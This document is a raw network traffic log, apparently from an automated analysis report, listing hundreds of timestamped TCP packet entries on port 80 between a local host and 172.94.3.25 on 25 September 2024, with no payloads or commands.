                                        Sep 25, 2024 18:40:31.357068062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357147932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357158899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357168913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357180119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357182026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357192039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357228041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357352972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357364893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357374907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357384920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357391119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357397079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357407093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357413054 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357418060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357429028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357434988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357440948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357450008 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357453108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357503891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357570887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357582092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357593060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357604027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357621908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357621908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357634068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357640028 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357688904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357701063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357711077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357722044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357733965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357744932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357744932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357757092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357759953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357773066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357784033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357788086 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357795000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.357804060 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.357837915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358001947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358014107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358025074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358045101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358122110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358133078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358144045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358155966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358156919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358175993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358292103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358303070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358314991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358325958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358326912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358335972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358347893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358359098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358361959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358369112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358381033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358381987 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358398914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358414888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358437061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358447075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358479023 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358505011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358515978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358526945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358540058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358549118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358575106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358733892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358745098 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358756065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358778000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358824968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358835936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358846903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358858109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.358858109 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.358875036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359008074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359019041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359030008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359040976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359042883 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359050989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359060049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359062910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359074116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359086037 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359087944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359097004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359107971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359124899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359149933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359160900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359213114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359291077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359302998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359313965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359324932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359335899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359345913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359347105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359358072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359369040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359379053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359389067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359406948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359411955 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359441042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359488964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359502077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359533072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359687090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359699011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359715939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359735012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359766960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359777927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359788895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359798908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359807014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359817982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359828949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359832048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359852076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359908104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359920979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359930992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359942913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359942913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359954119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359966040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359966040 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.359980106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359992027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.359996080 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360013008 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360080957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360100985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360111952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360111952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360121965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360133886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360140085 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360162973 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360342979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360385895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360397100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360420942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360462904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360472918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360483885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360496044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360496998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360512018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360569000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360579967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360590935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360601902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360604048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360615015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.360620975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.360657930 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.549309015 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.554486990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554558992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554610968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554642916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554660082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.554677963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554687023 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.554712057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554759979 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.554764032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554796934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554830074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554841042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.554881096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554913998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.554929018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.554945946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555005074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555011988 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555038929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555084944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555090904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555126905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555162907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555171967 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555197001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555229902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555264950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555268049 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555298090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555330038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555344105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555362940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555372000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555454016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555488110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555497885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555521011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555572033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555604935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555617094 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555636883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555646896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555671930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555705070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555718899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555737972 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555769920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555802107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555811882 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555834055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555845976 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555886030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555942059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.555995941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.555995941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556030989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556041002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556062937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556096077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556128025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556143999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556171894 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556171894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556204081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556236029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556267977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556281090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556301117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556313992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556334019 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556366920 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556400061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556405067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556442022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556456089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556504965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556538105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556570053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556581020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556603909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556613922 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556634903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556667089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556678057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556699991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556731939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556766987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556777000 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556799889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556807995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556832075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556864977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556909084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.556915045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556947947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556981087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.556993008 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557020903 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557029963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557061911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557094097 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557126999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557136059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557168961 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557180882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557214022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557264090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557288885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557296038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557328939 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557356119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557360888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557393074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557401896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557426929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557460070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557471037 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557509899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557543039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557550907 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557574987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557617903 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557626009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557657957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557692051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557701111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557723999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557758093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557796001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557806969 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557840109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557849884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557872057 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557924986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557956934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.557967901 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.557990074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558001041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558022976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558068037 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558073997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558106899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558139086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558170080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558181047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558209896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558219910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558252096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558296919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558303118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558335066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558367014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558397055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558406115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558433056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558439016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558465004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558501959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558509111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558562040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558598995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558609009 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:31.558633089 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:31.558676004 CEST4971680192.168.2.6172.94.3.25
